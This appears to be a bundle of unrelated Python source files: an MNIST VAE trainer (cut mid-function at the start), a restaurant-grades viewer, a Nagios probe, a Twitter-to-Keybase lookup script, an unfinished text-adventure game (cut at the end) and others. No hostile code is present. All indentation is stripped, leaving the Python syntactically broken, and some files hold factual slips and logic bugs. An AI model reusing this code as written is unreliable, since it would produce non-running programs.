for j, rg in enumerate(zip(reconstructed, generated)):
for n, i in zip(name, rg):
path = os.path.join(save_to, str(j)+n)
img = i.reshape(28, 28).astype(np.uint8)
img = Image.fromarray(img)
img.save(path)
return _func
def main():
trainset = MNIST(root ='./mnist',
train =True,
download =True,
transform=ToTensor())
validationset = MNIST(root ='./mnist',
train =False,
download =True,
transform=ToTensor())
train_loader = DataLoader(trainset,
batch_size =128,
shuffle =True,
num_workers=2)
validation_loader = DataLoader(validationset,
batch_size =128,
shuffle =False,
num_workers=2)
device = torch.device('cuda:0')
enc = Encoder()
dec = Decoder()
opt = optim.Adam(list(enc.parameters())+list(dec.parameters()), lr=1e-4)
enc.to(device)
dec.to(device)
train_updater = VAEUpdater(enc, dec, tag='tr', optimizer=opt)
validation_updater = VAEUpdater(enc, dec, tag='vl')
trainer = Trainer(loader =train_loader,
updater=train_updater,
device =device,
save_to='./result')
trainer.log_report(keys =['tr/bce', 'vl/bce', 'tr/kld', 'vl/kld'],
plots ={
'bce.png':['tr/bce', 'vl/bce'],
'kld.png':['tr/kld', 'vl/kld']
},
trigger=(1, 'epoch'))
trainer.add_evaluation(loader =validation_loader,
updater=validation_updater,
trigger=(1, 'epoch'))
trainer.save_model(path ='models/encoder_{epoch}.pth',
model =enc,
trigger=(1, 'epoch'))
trainer.save_model(path ='models/decoder_{epoch}.pth',
model =dec,
trigger=(1, 'epoch'))
trainer.save_trainer(path ='trainer.pth',
models ={'encoder':enc, 'decoder':dec, 'opt':opt},
trigger=(1, 'epoch'))
trainer.add_event(example(enc, dec, validationset, './example', device),
trigger=(1, 'epoch'))
trainer.run()
if __name__ == "__main__":
main()
|
import time,datetime
class InsuranceTime:
def nowtime(self):
nowtime=datetime.date.today()
return nowtime
def policyBeginDate(self,day):
return str(self.nowtime()+datetime.timedelta(days=day))+" 00:00:00"
def policyEndDate(self,day):
return str(self.nowtime()+datetime.timedelta(days=day))+" 23:59:59"
if __name__ == '__main__':
policyDate=InsuranceTime()
print policyDate.nowtime()
print policyDate.policyBeginDate(1)
print policyDate.policyEndDate(365) |
#!/usr/bin/env python
from useless.decorators import extends
__author__ = 'Ronie Martinez'
class Base1(object):
def __init__(self, value):
self.value = value
def double(self):
return self.value * 2
class Base2(object):
def __init__(self, value):
self.value = value
def double(self):
return self.value * 4
def triple(self):
return self.value * 3
# Warning! Read UPWARDS: Base1 is applied first before Base2... and so on...
@extends(Base2)
@extends(Base1)
class Derived2(object):
pass
d2 = Derived2(10)
print d2.double() # prints 20
print d2.triple() # prints 30
|
"""
This part generates the results, it launches an small interfase where the user has to write 1 to display results or q to quit.
Once all is launched, it returns to the menu.
Exception handling and input validation is done for each part.
IMPORTANT : The input MUST be in the same directory as this .py file
"""
__author__ = 'lqo202'
import Clean_DB as clean
import Grade as g
import pandas as pd
from matplotlib import pyplot as plt
##### Previous functions to validate input, handle exceptions and launch the result####
def printingresults1(grades_db):
print 'Grades of restaurants by boro:'
try:
for boro in list(grades_db.BORO.unique()):
filtered = grades_db[grades_db['BORO']==boro]
#Results of scores
total = filtered.test_restaurant_in_boro(boro)
print "Score in %s is %i" %(boro, total)
#Plot
filtered.plot_by_boro(boro)
if boro != list(grades_db.BORO.unique())[-1]:
print "Close window to continue displaying"
plt.show()
except ValueError:
print "Oops! That was no valid input. Try again!"
except ArithmeticError:
print 'ArithmeticError ocurred in boros'
except LookupError:
print 'LookupError ocurred in boros'
except AttributeError:
print 'Attribute error in boros'
except TypeError:
print 'Type Error in boros'
def printingresults2(data):
print 'Results for NYC, processing...'
try:
#Plotting
graph = data.plot_by_boro()
plt.show()
print 'Showing and saving graph of evolution of grades in restaurants in NYC'
#Calling results by boro
printingresults1(data)
except KeyboardInterrupt:
print 'Keyboard interrupted, try again!'
except ArithmeticError:
print 'ArithmeticError ocurred results NY'
except LookupError:
print 'LookupError ocurred results NY'
except ValueError:
print 'Value error ocurred in results BY'
########### Importing the DB ############
def import_data(file ="DOHMH_New_York_City_Restaurant_Inspection_Results.csv"):
#Uploading DB, just columns needed
#Type of vars where found on the URL of the database
db_types = {'CAMIS':str,
'BORO': str,
'GRADE': str,
'GRADE DATE': str}
ratings = pd.read_csv(file, usecols= ['CAMIS', 'BORO', 'GRADE', 'GRADE DATE'], dtype=db_types)
return ratings
############## Final screening of results #########
def mainwindow():
print 'Restaurants in NYC info: Assignment 10 - Programming for Data Science'
while True:
try:
optionuser = raw_input('Menu: Press 1 to start showing some plots and results, q for exit :')
if optionuser == 'q': break
else:
if int(optionuser) == 1:
ratings = import_data()
#Creating CleanDB object and cleaning
ratings_db = clean.clean_DB(ratings)
rating_clean = ratings_db.clean_all()
#Creating grades object
grades_db = g.grades(rating_clean)
print "Data was cleaned! Processing ..."
#Calling NYC results
printingresults2(grades_db)
else:
print "That option was not valid, try again!"
except ValueError:
print "Oops! That was no valid input. Try again with a number!"
except KeyboardInterrupt:
print 'Keyboard interrupted, try again!'
except IOError:
print 'File not found!'
if __name__ == "__main__":
try:
mainwindow()
except EOFError:
pass
|
#############################################################################
# Copyright (c) Members of the EGEE Collaboration. 2006-2010.
# See http://www.eu-egee.org/partners/ for details on the copyright holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Joel Casutt - joel.casutt@switch.ch
# Minor modifications:
# Henri Mikkonen - henri.mikkonen@hip.fi
#############################################################################
'''
Created on 4/jan/2012
@author: joelcasutt
'''
from AbstractProbe import PsudonymityAbstractProbe
from HTTPSHandler import HTTPSClientAuthenticationHandler
from urllib2 import HTTPError, URLError
import urllib2
class PseudonymityProbe( PseudonymityAbstractProbe ):
def __init__( self, serviceName, clientAuth ):
super(PseudonymityProbe, self).__init__(serviceName, clientAuth)
"""
return the status dictionary
"""
def getStatus( self ):
if self.isHTTPSClientAuthNenabled():
self.file_exists(self.options.key)
self.file_exists(self.options.cert)
cert_handler = HTTPSClientAuthenticationHandler(key=self.options.key,
cert=self.options.cert,
timeout=self.options.timeout)
opener = urllib2.build_opener(cert_handler)
urllib2.install_opener(opener)
try:
if self.options.verbose:
print "Contacting %s..." % self.url
f = urllib2.urlopen(self.url)
except HTTPError, e:
self.nagios_critical("Error: %s: %s" % (self.url, e))
except URLError, e:
self.nagios_critical("Error: %s: %s" % (self.url, e))
status = dict()
for line in f:
try:
(key, value) = line.rsplit('\n')[0].split(": ")
status[key] = value
except ValueError, e:
self.nagios_critical("CRITICAL: Status not found from the response")
return status
def getPickleFile( self ):
print "no pickle-file needed for this service (Status)"
"""
Exits with NAGIOS_CRITICAL if file doesn't exist or is not readable
"""
def file_exists(self, file):
try:
open(file, "r")
except IOError, e:
self.nagios_critical(e)
|
class EnglishLength:
def __init__(self, yards=0, feet=0, inches=0):
self.__yards = yards + feet//3
self.__feets = feet + inches//12
self.__inches = inches%12
self.__feets%=3
def __add__ (self,other):
return (self.__inches + other.__inches, self.__yards + other.__yards, self.__feets + other.__feets)
test1 = EnglishLength(25,15,14)
test2 = EnglishLength(30,15,14)
print(test1.__add__(test2))
|
import doctest
import unittest
from zeam.form.ztk.testing import FunctionalLayer
def test_suite():
optionflags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS
globs= {}
suite = unittest.TestSuite()
for filename in ['bool.txt', 'choice.txt', 'collection_set.txt',
'collection_list.txt', 'collection_object.txt',
'multichoice.txt', 'object.txt', 'date.txt',
'radio.txt', 'uri.txt', 'text.txt', 'time.txt',
'currency.txt', 'number.txt']:
test = doctest.DocFileSuite(
filename,
optionflags=optionflags,
globs=globs)
test.layer = FunctionalLayer
suite.addTest(test)
return suite
|
import sys
import itertools
from tree import binary_tree
from collections import deque
#input params
input_list = [-3, -2, 1, 9, 5, -1, 11];
#input_list = [2, 1, 3];
tree = binary_tree(input_list);
print("LEVELS OF OUR TREE:");
tree.print_tree();
print("");
'''
SOLUTION: note that -
*everything on the same level can be added in ANY ORDER
*every level should be added in ASCENDING ORDER
'''
#make a list of nodes on same level using BFS
node_list = deque([tree.root, None]);
counter = tree.give_height()+1;
final_list = [];
print_list = [];
while(counter and tree.root and node_list):
element = node_list.popleft();
if (not element):
final_list.append(print_list);
print_list = [];
node_list.append(None);
counter -= 1;
continue;
print_list.append(element.value);
add_list = [element.prev, element.next];
add_list = [element for element in add_list if element];
node_list.extend(add_list);
#create all possible permutations at each level
final_list = [ list(itertools.permutations(element)) for element in final_list ];
#use backtracking to print all possibilities (NOTE: for efficiency, you can use a dynamically created for-loop)
def backtrack(input_list):
#check if we have a solution at hand
if (len(input_list) == len(final_list)):
#re-format the list
output = [];
for storage in input_list:
for element in storage:
output.append(element);
#print the formatted list
print(output);
else:
#prepare a list of candidates
candidates = final_list[len(input_list)];
for element in candidates:
input_list.append(element);
backtrack(input_list);
input_list.pop();
#execute the backtracking method
print("ALL THE POSSIBILITES ARE: ");
backtrack([]);
|
# Add a Secret Key, and info from Facebook, Google, and GitHub.
# Social Logins won't work without your IDs and Secrets added.
SECRET_KEY = 'development key'
FB_APP_ID = 'Facebook App ID'
FB_APP_SECRET = 'Facebook App Secret'
GOOGLE_CLIENT_ID = 'Google Client Id'
GOOGLE_CLIENT_SECRET = 'Google Client Secret'
GITHUB_CLIENT_ID = 'GitHub Client ID'
GITHUB_CLIENT_SECRET = 'GitHub Client Secret'
SQLALCHEMY_DATABASE_URI = 'sqlite:///../instance/course_catalog.db'
|
#!/usr/bin/env
# -*- coding: utf-8 -*-
__author__ = 'Vmture'
from com.common import CommonFunction
from com.re_rules import xiaomi_rules, message_kinds_xiaomi
import time
import re
com = CommonFunction()
name = '小米'
def get_update_messages():
update_datas = ''
update_messages = [str(time.ctime())]
datas = com.get_tmp_contents(name)
####获取定位内容
for data in datas:
if re.compile(xiaomi_rules['定位_a']).search(data):
contents_a = com.re_find_messages(xiaomi_rules['定位_a'], data)
number = datas.index(data)
if re.compile(xiaomi_rules['定位_b']).search(data):
contents_b = com.re_find_messages(xiaomi_rules['定位_b'], data)
####获取软件大小
update_messages.append(com.re_find_messages(xiaomi_rules['软件大小'], contents_a))
####获取版本号
update_messages.append(com.re_find_messages(xiaomi_rules['版本号'], contents_a))
####获取更新时间
update_messages.append(com.re_find_messages(xiaomi_rules['更新时间'], contents_a))
####获取包名
update_messages.append(com.re_find_messages(xiaomi_rules['包名'], contents_a))
####获取appid
update_messages.append(com.re_find_messages(xiaomi_rules['appid'], contents_a))
####获取下载地址
download_url = 'http://app.mi.com' + com.re_find_messages(xiaomi_rules['下载地址'], datas[number])
####获取更新内容
update_datas_list = re.compile(xiaomi_rules['新版特性']).findall(contents_b)
for data in update_datas_list[1:]:
update_datas += data+'; '
update_messages.append(update_datas)
return update_messages, download_url
def run():
url = com.find_url(name)
header = com.find_header(name)
com.get_page_source_requests(url, name, header)
last_messages, download_url = get_update_messages()
path, end = com.run_b(name, last_messages, download_url, message_kinds_xiaomi)
return path, end
if __name__ == '__main__':
a, b = run()
print(a)
print(b) |
"""ICMPv4 Objects Class."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
import logging
import warnings
class ICMPv4Objects(APIClassTemplate):
"""The ICMPv4Objects Object in the FMC."""
VALID_JSON_DATA = [
"id",
"name",
"type",
"overrideTargetId",
"code",
"icmpType",
"overrides",
"overridable",
]
VALID_FOR_KWARGS = VALID_JSON_DATA + []
URL_SUFFIX = "/object/icmpv4objects"
VALID_CHARACTERS_FOR_NAME = """[.\w\d_\- ]"""
def __init__(self, fmc, **kwargs):
"""
Initialize ICMPv4Objects object.
Set self.type to "ICMPv4Object" and parse the kwargs.
:param fmc: (object) FMC object
:param kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for ICMPv4Objects class.")
self.parse_kwargs(**kwargs)
self.type = "ICMPV4Object"
class ICMPv4Object(ICMPv4Objects):
"""
Dispose of this Class after 20210101.
Use ICMPv4Objects() instead.
"""
def __init__(self, fmc, **kwargs):
warnings.resetwarnings()
warnings.warn(
"Deprecated: ICMPv4Object() should be called via ICMPv4Objects()."
)
super().__init__(fmc, **kwargs)
|
import logging
import logging.handlers
log = logging.getLogger('myLogger')
log.setLevel(logging.INFO)
formatter = logging.Formatter('[%(levelname)s] (%(filename)s:%(lineno)d) > %(message)s')
fileHandler = logging.FileHandler('./log.txt')
fileHandler.setFormatter(formatter)
log.addHandler(fileHandler)
if __name__ == '__main__':
log.debug('debug')
log.info('info') |
#!/usr/bin/env python
"""
Truncates the first and last a,b tokens from each line,
where a,b are arguments from sys.argv.
(The truncate_char.py on the other hand, truncates individual characters)
Strings are split into "tokens" use white-space as a delimiter.
"""
import sys
def main():
if (len(sys.argv) <= 1):
sys.stderr.write('Error: expected the number of truncations as an argument\n')
truncate_a = int(sys.argv[1])
if (len(sys.argv) >= 3):
truncate_b = int(sys.argv[2])
else:
truncate_b = truncate_a
for line in sys.stdin:
line = line.strip()
tokens = line.split()
if (len(line) > (truncate_a + truncate_b)):
truncated_tokens = tokens[truncate_a:len(tokens)-truncate_b]
else:
truncated_tokens = []
for i in range(0,len(truncated_tokens)):
sys.stdout.write(truncated_tokens[i])
if i+1 < len(truncated_tokens):
sys.stdout.write(' ')
sys.stdout.write('\n')
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import sys
sys.path.append('../../python')
import inject
import logging
from model.config import Config
''' configuro el injector con las variables apropiadas '''
def config_injector(binder):
binder.bind(Config, Config('firmware-config.cfg'))
inject.configure(config_injector)
import camabio
from firmware import Firmware
# from network import websocket
logging.getLogger().setLevel(logging.DEBUG)
from autobahn.asyncio.wamp import ApplicationSession
from asyncio import coroutine
class WampMain(ApplicationSession):
def __init__(self, config=None):
logging.debug('instanciando wampSinchronizer')
ApplicationSession.__init__(self, config)
@coroutine
def onJoin(self, details):
logging.debug('session joined')
while True:
try:
logging.info('identificando')
yield from self.call('assistance.firmware.identify')
except Exception as e:
logging.exception(e)
if __name__ == '__main__':
# from autobahn.twisted.wamp import ApplicationRunner
from autobahn.asyncio.wamp import ApplicationRunner
from network.wampFirmware import WampFirmware
runner = ApplicationRunner(url='ws://localhost:8000/ws', realm='assistance', debug=True, debug_wamp=True, debug_app=True)
runner.run(WampMain)
|
from django.contrib import admin
# Register your models here.
from .models import Bid, Category, Comment, Listing, User, Watchlist
admin.site.register(Category)
admin.site.register(Listing)
admin.site.register(Bid)
admin.site.register(User)
admin.site.register(Watchlist)
admin.site.register(Comment)
|
"""
dictionary.py
NFL Head Coaches
"""
import sys
coaches = {
"Arizona Cardinals": "Bruce Arians",
"Atlanta Falcons": "Dan Quinn",
"Baltimore Ravens": "John Harbaugh",
"Buffalo Bills": "Sean McDermot",
"Carolina Pathers": "Ron Rivera",
"Chicago Bears": "John Fox",
"Cincinnati Bengals": "Marvin Lewis",
"Cleveland Browns": "Hue Jackson",
"Denver Broncos": "Vance Joseph",
"Detroit Lions":"Jim Caldwell",
"Green Bay Packers":"Mike McCarthy",
"Houston Texans":"Bill O'Brian",
"Indianapolic Colts":"Chuck Pagano",
"Jacksonville Jaguars":"Doug Marron",
"Kansas City Chiefs":"Andy Reid",
"Los Angeles Chargers":"Anthony Lynn",
"Los Angeles Rams":"Sean McVay",
"Miami Dolphins":"Adam Gase",
"Minnesota Vikings":"Mike Zimmer",
"New England Patriots":"Bill Belichick",
"New Orleans Saints":"Sean Payton",
"New York Giants":"Ben McAdoo",
"New York Jets":"Todd Bowles",
"Oakland Raiders":"Jack Del Rio",
"Philadelphia Eagles":"Doug Pederso",
"Pittsburgh Steelers":"Mike Tomlin",
"San Francisco 49ers":"Kyle Shanahan",
"Seatle Seahawks":"Pete Carroll",
"Tampa Bay Buchaneers":"Dirk Koette",
"Tennessee Titans":"Mike Mularkey",
"Washington Redskins":"Jay Gruden"
}
while True:
try:
team = input("Please enter a NFL Team: ")
print()
except EOFError:
sys.exit(0)
try:
definition = coaches[team]
except KeyError:
print("Sorry, \"", team, "\" is not a team in the NFL.", sep = "")
print()
continue #Go back up to the word "while".
print("The coach of the NFL team is ",team.capitalize()," is: ", definition, ".", sep = "")
print()
sys.exit(0)
|
import time
import pyglet
import os
import webbrowser
def disp_start():
""" Display Information when program start
"""
ct = time.ctime()
print("Program Start at %s" % ct)
def disp_end():
""" Display Information when program end
"""
ct = time.ctime()
print("Program End at %s" % ct)
def run_app(path):
player = pyglet.media.Player()
source = pyglet.media.load(path)
video_format = source.video_format
window = pyglet.window.Window(width=video_format.width, height=video_format.height)
player.queue(source)
player.play()
print(player.get_texture())
@window.event
def on_draw():
window.clear()
player.get_texture().blit(0, 0)
pyglet.app.run()
pyglet.app.exit()
def main():
path = os.path.join(os.getcwd(),'media','aLIEz.mp4')
url = 'https://music.163.com/#/video?id=969875A89904E2F4D88B672F62036D53&userid=1290932071'
disp_start()
break_times = 5
break_count = 0
while break_count < break_times:
#run_app(path)
webbrowser.open(url)
time.sleep(30*60)
break_count += 1
if __name__ == '__main__':
main() |
import requests
import re, ast
import os, sys, shutil
from subprocess import call
import json, time
from zipfile import ZipFile, is_zipfile
# Files
folders = [r'results', r'results/temp']
for f in folders:
if not os.path.exists(f):
os.makedirs(f)
# find the data file, assign to 'dataIn' variable
allFiles = []
datadir = 'data'
filesToExtract = ['following.js', 'follower.js']
zipFound = False
for filename in os.listdir(datadir):
fileAtLocation = f"{datadir}/{filename}"
if is_zipfile(fileAtLocation):
zipFound = True
with ZipFile(fileAtLocation, 'r') as unzipped:
for f in filesToExtract:
try:
unzipped.extract(f, datadir)
allFiles.append(f)
except KeyError:
pass
if not(zipFound):
for filename in os.listdir(datadir):
if '.js' in filename:
allFiles.append(filename)
# set the results file
parsedUsernames = 'results/temp/parsedUsernames.txt'
resultsOut = 'results/onKeybase.txt'
open(parsedUsernames, 'a').close() # makes file if it doesn't exist
# set Twitter lookup URL
url_head = 'https://twitter.com/intent/user?user_id='
# get the Twitter userID list data
def getData(readFile):
writeFile = 'results/temp/data.txt'
with open(readFile, 'r') as r, open(writeFile, 'w') as w:
for i, line in enumerate(r):
if i == 0:
trunc = re.findall('= (.*)', line)[0]
w.write(trunc + '\n')
else:
w.write(line)
with open(writeFile, 'r') as w:
return ast.literal_eval(w.read())
dataIn = []
try:
for f in allFiles:
datafile = f"{datadir}/{f}"
dataIn.extend(getData(datafile))
except NameError:
print("Error: Data file is missing from 'data/' directory.")
sys.exit(1)
# Processing functions
def processedUsers():
processedUserIDs = []
lookupDict = {}
with open(parsedUsernames, 'r') as p:
try:
processed = ast.literal_eval(p.read().replace('\n', ''))
except SyntaxError:
processed = []
for userDict in processed:
for k, v in userDict.items():
processedUserIDs.append(k)
lookupDict[k] = v
return processedUserIDs, processed, lookupDict
def fetchUsername(allUserIDs):
timeout = 0
attempts = 10
allUsernames = []
count = len(allUserIDs)
processedUserIDs, processed, lookupDict = processedUsers()
pingMsg, fileMsg = "pinging Twitter...", "(from file) |"
while len(allUserIDs) > 0:
# logic for loop counter
if timeout >= attempts:
time.sleep(1)
http_error = data.status_code
print(f"Twitter endpoint exhausted. Please try again in 1 minute.")
print(f"([HTTP {http_error} Code] for reference)\n")
sys.exit(10)
userid = allUserIDs.pop(0)
# check processed file first for userid
if userid in processedUserIDs:
username = lookupDict[userid]
allUsernames.append(username)
print(f"{fileMsg} {len(allUsernames)} of {count}: @{lookupDict[userid]}")
continue
# ping Twitter if userid not found in processed file
time.sleep(0.1)
print(pingMsg)
url = url_head + userid
data = requests.get(url)
try:
username = re.findall("\(@(.*?)\) on Twitter", data.text.replace("\n", ""))[0]
allUsernames.append(username)
userDict = {userid: username}
processed.append(userDict)
print(end="\033[F")
print(f"{pingMsg} {len(allUsernames)} of {count}: @{username}")
with open(parsedUsernames, 'r+') as p:
p.write(str(processed))
timeout = 0
except IndexError: # Twitter times out around every 100 lookups
warn, bold, _end= '\033[93m', '\033[1m', '\033[0m'
dots = [". ", ".. ", "..."]
if timeout == 0:
print(f"{warn}{len(allUsernames)+1} of {count}: userID #{userid} failed{_end}")
else:
print(end="\033[F" * 5)
timeout += 1
allUserIDs.insert(0, userid)
print(f"\nTwitter request limit temporarily exceeded.", \
f"Will try {bold}{attempts} attempts{_end} to regain connection.")
print(f"(Attempt {warn}#{timeout} of {attempts}{_end}), please wait{dots[timeout%3]}\n")
return allUsernames
def fetchKeybase(my_followers):
scraped = 'results/temp/scrape.txt'
filtered = 'results/temp/filtered.txt'
# Scrape twitter usernames against Keybase
open(scraped, 'w').close() # creates/clears file
for i, foll in enumerate(my_followers):
callable = foll + "@twitter"
print(f"Retrieving {i+1} of {len(my_followers)}: {callable}...")
with open(scraped, 'a') as s:
call(["keybase", "id", callable], stdout=s, stderr=s)
# Filter out names not found
open(filtered, 'w').close() # creates/clears file
check = 'No resolution found'
with open(scraped, 'r') as s:
for line in s:
if check not in line:
with open(filtered, 'a') as f:
f.write(line)
# Extract usernames as list from filtered data
with open(filtered, 'r') as f:
data = f.read().replace('\n', '')
usernamesOnKeybase = re.findall("Identifying \[1m(.*?)", data)
# Clean up temp files
shutil.rmtree("results/temp")
return usernamesOnKeybase
def getTwitterUsernames():
allUserIDs = []
for i in dataIn:
userid = i[list(i.keys())[0]]['accountId']
if userid not in allUserIDs:
allUserIDs.append(userid)
return fetchUsername(allUserIDs)
def run():
allUsernames = getTwitterUsernames() #replace this assignment if alternative Twitter list source
usernamesOnKeybase = fetchKeybase(allUsernames)
# Write usernames list to file
usernamesJSON = json.dumps(usernamesOnKeybase, indent=2)
with open(resultsOut, 'w') as results:
results.write(f"usernames = {usernamesJSON}")
b, _b = '\033[1m', '\033[0m'
print(f"\n\nYOU HAVE {len(usernamesOnKeybase)} TWITTER USERS ON KEYBASE:\n{usernamesJSON[1:-3]}")
print(f"\n*** Usernames on Keybase have been placed at {b}'{resultsOut}'{_b}. ***\n")
if __name__ == "__main__":
run()
|
"""
Game Version Info:
[Major build number].[Minor build number].[Revision].[Package]
i.e. Version: 1.0.15.2
Major build number: This indicates a major milestone in the game, increment this when going from beta to release, from
release to major updates.
Minor build number: Used for feature updates, large bug fixes etc.
Revision: Minor alterations on existing features, small bug fixes, etc.
Package: Your code stays the same, external library changes or asset file update."""
import random
import sys
# import pickle
import shelve
import time
from Actors_2 import player, Creature
ZONENAME = ''
DESCRIPTION = 'description'
EXAMINATION = 'examine'
SOLVED = False
UP = 'up', 'north'
DOWN = 'down', 'south'
LEFT = 'left', 'west'
RIGHT = 'right', 'east'
solved_places = {'a1': False, 'a2': False, 'a3': False, 'a4': False,
'b1': False, 'b2': False, 'b3': False, 'b4': False,
'c1': False, 'c2': False, 'c3': False, 'c4': False,
'd1': False, 'd2': False, 'd3': False, 'd4': False,
}
rooms = {
'a1': {
ZONENAME: "Town Market",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b1',
LEFT: '',
RIGHT: 'a2',
},
'a2': {
ZONENAME: "Town Entrance",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b2',
LEFT: 'a1',
RIGHT: 'a3',
},
'a3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b3',
LEFT: 'a2',
RIGHT: 'a4',
},
'a4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b4',
LEFT: 'a3',
RIGHT: 'a5',
},
'a5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b5',
LEFT: 'a4',
RIGHT: '',
},
'b1': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'a1',
DOWN: 'c1',
LEFT: '',
RIGHT: 'b2',
},
'b2': {
ZONENAME: "Home",
DESCRIPTION: 'This Is Your Home',
EXAMINATION: 'Your Home Looks The Same - Nothing Has Changed',
SOLVED: False,
UP: 'a2',
DOWN: 'c2',
LEFT: 'b1',
RIGHT: 'b3',
},
'b3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'a3',
DOWN: 'c3',
LEFT: 'b2',
RIGHT: 'b4',
},
'b4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'a4',
DOWN: 'c4',
LEFT: 'b3',
RIGHT: 'b5',
},
'b5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'a5',
DOWN: 'c5',
LEFT: 'b4',
RIGHT: '',
},
'c1': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b1',
DOWN: 'd1',
LEFT: '',
RIGHT: 'c2',
},
'c2': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b2',
DOWN: 'd2',
LEFT: 'c1',
RIGHT: 'c3',
},
'c3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b3',
DOWN: 'd3',
LEFT: 'c2',
RIGHT: 'c4',
},
'c4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b4',
DOWN: 'd4',
LEFT: 'c3',
RIGHT: 'c5',
},
'c5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b5',
DOWN: 'd5',
LEFT: 'c4',
RIGHT: '',
},
'd1': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c1',
DOWN: 'e1',
LEFT: '',
RIGHT: 'd2',
},
'd2': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c2',
DOWN: 'e2',
LEFT: 'd1',
RIGHT: 'd3',
},
'd3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c3',
DOWN: 'e3',
LEFT: 'd2',
RIGHT: 'd4',
},
'd4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c4',
DOWN: 'e4',
LEFT: 'd3',
RIGHT: 'd5',
},
'd5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c5',
DOWN: 'e5',
LEFT: 'd4',
RIGHT: '',
},
'e1': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
'e2': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
'e3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
'e4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
'e5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
}
"""
Old
rooms = {
1: {"name": "1", "d": 2, "s": 6},
2: {"name": "2", "d": 3, "s": 7, "a": 1},
3: {"name": "3", "d": 4, "a": 2},
4: {"name": "4", "d": 5, "s": 9, "a": 3},
5: {"name": "5", "s": 10, "a": 4},
6: {"name": "6", "d": 7, "s": 11, "w": 1},
7: {"name": "7", "a": 6, "s": 12, "w": 2},
8: {"name": "8", },
9: {"name": "9", "d": 10, "s": 14, "w": 4},
10: {"name": "10", "s": 15, "a": 9, "w": 5},
11: {"name": "11", "d": 12, "s": 16, "w": 6},
12: {"name": "12", "d": 13, "s": 17, "a": 11, "w": 7},
13: {"name": "13", "d": 14},
14: {"name": "14", "d": 15, "s": 19, "a": 13, "w": 9, "item": "key"},
15: {"name": "15", "a": 14, "s": 20, "w": 10},
16: {"name": "16", "d": 17, "s": 21, "w": 11},
17: {"name": "17", "d": 18, "a": 16, "s": 22, "w": 12},
18: {"name": "18", "d": 19, "a": 18, "s": 23, "w": 13},
19: {"name": "19", "d": 20, "a": 17, "s": 24, "w": 14},
20: {"name": "20", "a": 19, "s": 25, "w": 15},
21: {"name": "21", "d": 22, "w": 16},
22: {"name": "22", "d": 23, "a": 21, "w": 17},
23: {"name": "23", "d": 24, "a": 22, "w": 18},
24: {"name": "24", "d": 25, "a": 23, "w": 19},
25: {"name": "25", "a": 24, "w": 20}
}"""
potion = (random.randint(0, 100))
mypos = 1
# epos = random.choice(rooms)
Player_Lvl = 0
extra_health = int(Player_Lvl) * 5
health = 100 + int(extra_health)
healthe = 10
Currency = 0
kill = 0
boss_kill = 0
current_room = mypos
myPlayer = player()
myPlayer.level = Player_Lvl
inventory = []
Xp = 0
def title_screen_selection():
option = input("> ")
if option.lower() == "play":
setup_game()
elif option.lower() == "help":
help_menu()
elif option.lower() == "quit":
quit_game_1()
while option.lower() not in ['play', 'help', 'quit']:
print("Please Enter A Valid Command")
option = input("> ")
if option.lower() == "play":
setup_game()
elif option.lower() == "help":
help_menu()
elif option.lower() == "quit":
